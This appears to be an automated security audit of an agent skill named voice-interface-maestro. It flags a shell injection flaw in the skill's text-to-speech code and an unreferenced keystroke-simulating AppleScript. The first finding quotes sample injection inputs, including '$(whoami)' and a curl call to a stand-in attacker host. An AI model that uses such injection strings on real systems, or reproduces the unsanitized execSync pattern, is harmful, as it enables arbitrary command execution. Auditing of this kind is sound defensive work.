voice-interface-maestro
Fail
Audited by Gen Agent Trust Hub on Mar 6, 2026
Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The
speakTextfunction insrc/lib.tsuseschild_process.execSyncto invoke the macOSsaycommand with user-provided text. The sanitization logic incleanTextForSpeechand the escaping mechanism inspeakTextare insufficient to prevent shell injection. Specifically, while it removes backticks and escapes double quotes, it fails to sanitize other shell metacharacters such as$(),;,&, and|. An attacker providing input like$(whoami)or; curl http://attacker.com/could execute arbitrary commands in the context of the agent process. - [COMMAND_EXECUTION]: The skill includes an unreferenced AppleScript file at
applescript/toggle_dictation.scptthat utilizesSystem Eventsto simulate keyboard input (key code). This capability, if exploited or activated, allows for unauthorized UI interaction and potentially bypassing security prompts on macOS.
Recommendations
- AI detected serious security threats
Audit Metadata